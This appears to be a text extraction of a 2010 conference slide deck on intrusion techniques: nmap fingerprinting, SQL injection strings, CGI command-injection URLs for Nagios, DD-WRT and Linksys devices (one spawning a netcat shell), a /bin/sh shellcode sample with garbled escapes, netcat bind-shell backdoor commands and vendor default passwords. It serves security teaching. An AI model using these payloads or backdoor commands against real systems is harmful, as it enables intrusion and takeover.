The document outlines various intrusion techniques and vulnerabilities in cybersecurity, including fingerprinting, SQL injection, command injection, and the use of exploits. It discusses tools and methodologies for discovering operating systems and services, along with different types of attacks like brute force and denial of service. Additionally, it covers the importance of addressing default passwords and introduces tools like Metasploit and network sniffers for security analysis.

1. Intrusion Techniques
DcLabs Hacking Tour 2010
Ewerson Guimarães (Crash)
Rener Silva (Gr1nch)

2. Agenda
FingerPrint
Web-Bugs
Backdoors MetaSploit
Brute Force IIS SemiColon
ShellCode Man-in-the-Middle
Exploits
Sniffers
Scanners/Fuzzers

3. FingerPrint
Grab informations about a target host.
Ex: It's used to identify Operational System and/or Services(daemon)
version number by TCP/IP response's unique characteristics.
The best tool for discovery operating systems, services,
devices and others: NMAP (Network Mapper)
Basic commands:
nmap host (Basic)
nmap –sV host (Service Versions)
nmap –P0 host ( ICMP ECHO-REPLY Ignore)
nmap –O host (Try to grab O.S version)
nmap –f host (Firewall/IDS/IPS Evasion)

4. Passive - FingerPrint
• TTL - What the operating system sets the Time To Live on the outbound packet
• Window Size - What the operating system sets the Window Size at.
• DF - Does the operating system set the Don't Fragment bit.
• TOS - Does the operating system set the Type of Service, and if so, at what.

5. FingerPrint
Matrix:

6. FingerPrint
U. Bourne

7. Web Vulnerability
These vulnerabilities are initially explored through malicious browser
requests compromising the target in a matter of minutes
SQL-Injection
Cross Site (XSS)
Cross Site Request Forgery (CSRF)
CGI’s Command Injection
PHP-Injection

8. Web Vulnerability
SQL-Injection
It occurs when the attacker can insert a series of SQL statements within a 'query'
by manipulating the data entry application.
SELECT campos FROM tabela WHERE campo = 'test@test.com';
Inject string: some' OR 'x'='x
SELECT fields FROM table WHERE field = ‘some' OR 'x'='x';
admin'-- " or 0=0 # ' or 1=1-- hi' or 'a'='a
' or 0=0 -- or 0=0 # " or 1=1-- hi') or ('a'='a
" or 0=0 -- ' or 'x'='x or 1=1-- hi") or ("a"="a

9. SQL-Injection

10. Web Vulnerability
CGI Command Injection
It occurs when the attacker insert a series of commands exploiting vulnerable CGI
scripts
Nagios:
https://www.xxx.com/nagios/cgi-bin/statuswml.cgi?ping=173.45.235.65%3Becho+
%24PATH
DD-WRT
http://www.xxx.com/cgi-bin/;nc$IFS-l$IFS-p$IFS5555$IFS-e$IFS/bin/sh
Linksys –Wireless
/setup.cgi?
ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&
ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=p
ing_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1
.1.1;/bin/ps aux&message= HTTP/1.1

11. ShellCode Introduction
#include <stdio.h>
main(){
char *comando[2];
comando[0]="/bin/sh";
comando[1]=NULL;
execve(comando[0],comando,NULL);
:}
char shellcode[] =
"xebx1fx5ex89x76x0ax31xc0x88x46x09x89x46x0exb0x0bx89"
"xf3x8dx4ex0ax8dx56x0excdx80x31xdbx89xd8x40xcdx80xe8"
"xdcxffxffxff/bin/sh";

12. Exploits
Kinds of Exploits:
Local: Usually, the objective of a local exploit is to elevate user's
privileges on the machine as close as possible to root (uid=0) or
administrator. They are written to exploit kernel bugs or suid binaries
Remote: It works over a network connection and exploit the
vulnerable target without any prior access to it.
www.securityfocus.com
www.milw0rm.com
www.secunia.com
www.exploit-db.com
0Days –It works usually an unpublished exploit from a brand new
found vulnerability. You can buy! $$$$$

13. Backdoors/RootKits
Used to maintain access to the system
We can Netcat use for this purpose
nc –vv –l –p 5555
nc –vv –l –p 5555 –e /bin/bash
nc <ip> <port>
RootKits
The main purpose of a rootkit is to hide the attacker's presence replacing vital
system binaries from target's system
Example:
Hide files (with match strings)
Run command when match strings
Hide processes
Hide open ports, and others.

14. Default/Weak passwords
Default passwords are set by its manufacturers/developers and were not
changed after the installation/configuration.
As supplied by the system vendor and meant to be changed at
installation time (Nobody do this shit)
Ex: Sw 3Com:
User: security
Pass: security
FireBird:
User: sysdba
Pass: masterkey
Weak: Passwords that are easily guessed or in a keyboard sequential
Ex:
123456
love
House´s phone
Birthday
Etc...

15. Brute Force
It consists in using random combinations of characters/numbers and
symbols, wordlists and/or string generators to crack a password
Ex:
John the Ripper
Hydra
SSH Brute Force

16. Brute Force
DirBuster - DirBuster is a multi threaded java application designed to brute force directories
and files names on web/application servers

17. Scanners/Fuzzers
There are 2 types of scanners: Specific which are written for a specific
vulnerability (BSQLHacker, SQLMAP) and Generic which are written for
various kinds of vulnerabilities. Generic scanners use known service
banners/strings to locate the potential target/vulnerabilities
Saint
W3af
Nexpose Community

18. Scanners/Fuzzers
Nexpose Community

19. Scanners/Fuzzers
W3af

20. Scanners/Fuzzers
Saint

21. Sniffers
Sniffer monitors and analyzes network traffic. Some of these packets
may contain critical information (such as logins, passwords and cool infos )
WhireShark -

22. DoS
Denial of Service, consist of attempts to prevent valid users from using a
particular feature or simply drop it
SYN FLOOD
UDP Packet Storm
DDoS
Smurf Attack

23. MetaSploit

24. MetaSploit

25. IIS SemiColon
Secure it? Wtf?

26. Man-in-the-Middle

27. Hardening your server
HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system
for vulnerabilities or problems in configuration files allowing you to get a quick
overview of the security status of your system.
http://hntool.net

28. UAI?
crash@dclabs.com.br irc.freenode.net
#dclabs
gr1nch@dclabs.com.br #securityguys